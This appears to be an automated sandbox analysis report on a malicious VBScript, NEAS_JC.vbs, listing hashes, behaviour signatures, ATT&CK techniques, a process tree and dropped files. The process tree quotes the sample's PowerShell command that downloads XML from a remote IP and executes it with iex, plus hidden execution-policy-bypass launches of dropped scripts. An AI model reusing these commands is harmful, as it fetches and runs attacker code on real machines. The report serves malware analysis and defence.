1bdfff81a5aed260c7d61de73e067747111d0b6944a0895bc564264dfc6cfca8

General

Target

NEAS_JC.vbs
Size

432B
MD5

274146f1ccf1afeafb17d64e0b6bd914
SHA1

4bd8ce0f9ba56cc60a35e63d30462881589bf5c7
SHA256

1bdfff81a5aed260c7d61de73e067747111d0b6944a0895bc564264dfc6cfca8
SHA512

f3a763036c76f82f343cca0133d8d9afbf7c5c0c7f3d2ec1d6cad837b71b12c07a3f9da70cb4466552c20f5330a0d3c08c8173eb6e3dd51ba8067a9e3953c1e8

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	5108	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
5108	powershell.exe
5108	powershell.exe
664	powershell.exe
664	powershell.exe
664	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeDebugPrivilege	664	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 648 wrote to memory of 5108	648	WScript.exe	85
PID 648 wrote to memory of 5108	648	WScript.exe	85
PID 5108 wrote to memory of 4284	5108	powershell.exe	99
PID 5108 wrote to memory of 4284	5108	powershell.exe	99
PID 4284 wrote to memory of 2780	4284	WScript.exe	100
PID 4284 wrote to memory of 2780	4284	WScript.exe	100
PID 2780 wrote to memory of 664	2780	cmd.exe	102
PID 2780 wrote to memory of 664	2780	cmd.exe	102
PID 5024 wrote to memory of 4408	5024	WScript.exe	113
PID 5024 wrote to memory of 4408	5024	WScript.exe	113
PID 4408 wrote to memory of 4128	4408	cmd.exe	115
PID 4408 wrote to memory of 4128	4408	cmd.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NEAS_JC.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xmldoc = New-Object System.Xml.XmlDocument; $xmldoc.'Load'('http://193.26.115.167:222/1.xml'); iex $xmldoc.command.a.execute
  2⤵
  - Blocklisted process makes network request
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5108
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Public\ini.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\ini.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2780
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\ini.ps1'"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:664

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\ReklamX.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\ReklamX.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\ReklamX.ps1"
    3⤵
    PID:4128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
6c36bb464ae2e6ef913b83d7048e8e94

SHA1
4e073a932c58b067164f93b48ed10d62969f4776

SHA256
4230cb0a9d772f5ee4949502aeb7224fd304140246567dae5c1a37e451396848

SHA512
b50d381d923c78e586c3304f392f64b31a820802a09342edc4dcb7c12bc59207d044355ea3149242727b7e9806a2f3016bb8dbf6566beb16bc0c30d6a5d0629e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
2KB

MD5
2d87fbdf06bb8c38123bb25130855cc7

SHA1
8bb251c3ca8f0c2612ab664ff0ef0ca3e3909ca6

SHA256
55c277069721bddf18f293608727ca0d87d7a91d3fd3c151eb94a5d9f0f9806b

SHA512
2511ad8c8f535ae5a1552bbbfaf78168d5b733240e014ded7a0bd98898d0e49d5eccfb11c928b2158e1aff2e8f5ecf6079bd62a496488b8717417afaf2750bdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sqnx2ssb.1uu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\ReklamX.bat

Filesize
190B

MD5
75db134e7941ac7093e2a0a82dd5c710

SHA1
52b1e5d355229302ce1def826d3842d3b346037d

SHA256
2a407f7b0e9fc016bdaa72700d28785fb61c49418c55e7be09dc68f71924379f

SHA512
d4ffe32ef04e2a0d6660aa52998b463d164415aec406d723dad3192887a8c82ecaaa03bea79f1d6032f41fc7c6dc0220fc0d4be17a310cd6698081a2fda5cc97

Download Submit
C:\Users\Public\ReklamX.vbs

Filesize
167B

MD5
5ae14dfcba7c2e476295b205eae785f0

SHA1
2c7e6db3ee6e83eeb17c0bc7e33e52bd6e4944d9

SHA256
05ddb55f4386b1b8d477c7b828ee44bda58b5cc1ab0d06e20a17acd84b44045d

SHA512
7b492fbbda3357149e97b59f4f2d2490e3b32e5ae31b66deaa11274a2f8c8a0cddb6a3e1a84d957ebcfcc5d3afb786aef9c746b18e940a28e819be98907ad4e5

Download Submit
C:\Users\Public\ini.bat

Filesize
192B

MD5
50d67ac3dfe55559558e009ca80eb632

SHA1
2bf8f4d3bb1944b02b5373ff81ae2c2eda307450

SHA256
81b3e8967d14e93c9a04224969c520102ad69035aef2834a89d152c7185c7a6e

SHA512
49499b556ca00ee445d35cec051557759b3503b4ceea7e8a2226b317368a160340e4d878b970384cf902939807541617a2049fb67ecfd1148dea4d4ebc0255d5

Download Submit
C:\Users\Public\ini.ps1

Filesize
747B

MD5
71d276530525756ea14087eaec0bc465

SHA1
8789d58df8c41d1a42be25e23bc9d73213f909f4

SHA256
2a3ef26379e1a38f96157b0b675609f1240302ae709147bea9cbf37a2519c512

SHA512
178003d1ce2c9b91c0a33e707161145be71437ef9d31d0befa2ee1e6dca8b3fa6d7c2aebffa266f38dac07f5e25f3c753864ab93b0a60b89440254602199ff96

Download Submit
C:\Users\Public\ini.vbs

Filesize
161B

MD5
1e651ff9a99f0a76bbd654c91cf500da

SHA1
9508362424f9870771cb1b54d6301ce42788bc29

SHA256
d066694bea475db86232d68bbfa35f23efdf2813e4b60aad4529409672dec6bf

SHA512
b04fad9255f5a771d57838d6ab1962a7b83ea1fe340951f079705cae232feb9975b0b89fd211b3aadabd6dcfbec44e7b49a5d8d05230eea94da7cad000f35a29

Download Submit
memory/664-54-0x000001E04C040000-0x000001E04C050000-memory.dmp

Filesize
64KB

Download
memory/664-42-0x000001E04C040000-0x000001E04C050000-memory.dmp

Filesize
64KB

Download
memory/664-41-0x00007FFE93A00000-0x00007FFE944C1000-memory.dmp

Filesize
10.8MB

Download
memory/664-43-0x000001E04C040000-0x000001E04C050000-memory.dmp

Filesize
64KB

Download
memory/664-57-0x00007FFE93A00000-0x00007FFE944C1000-memory.dmp

Filesize
10.8MB

Download
memory/5108-14-0x000001E937C50000-0x000001E937C64000-memory.dmp

Filesize
80KB

Download
memory/5108-20-0x000001E937C70000-0x000001E937C7A000-memory.dmp

Filesize
40KB

Download
memory/5108-39-0x00007FFE93A00000-0x00007FFE944C1000-memory.dmp

Filesize
10.8MB

Download
memory/5108-19-0x000001E937C90000-0x000001E937CA2000-memory.dmp

Filesize
72KB

Download
memory/5108-18-0x000001E91EAD0000-0x000001E91EAE0000-memory.dmp

Filesize
64KB

Download
memory/5108-17-0x000001E91EAD0000-0x000001E91EAE0000-memory.dmp

Filesize
64KB

Download
memory/5108-16-0x000001E91EAD0000-0x000001E91EAE0000-memory.dmp

Filesize
64KB

Download
memory/5108-15-0x00007FFE93A00000-0x00007FFE944C1000-memory.dmp

Filesize
10.8MB

Download
memory/5108-5-0x000001E91EB10000-0x000001E91EB32000-memory.dmp

Filesize
136KB

Download
memory/5108-13-0x000001E937AB0000-0x000001E937AD6000-memory.dmp

Filesize
152KB

Download
memory/5108-12-0x000001E91EAD0000-0x000001E91EAE0000-memory.dmp

Filesize
64KB

Download
memory/5108-11-0x000001E91EAD0000-0x000001E91EAE0000-memory.dmp

Filesize
64KB

Download
memory/5108-10-0x00007FFE93A00000-0x00007FFE944C1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing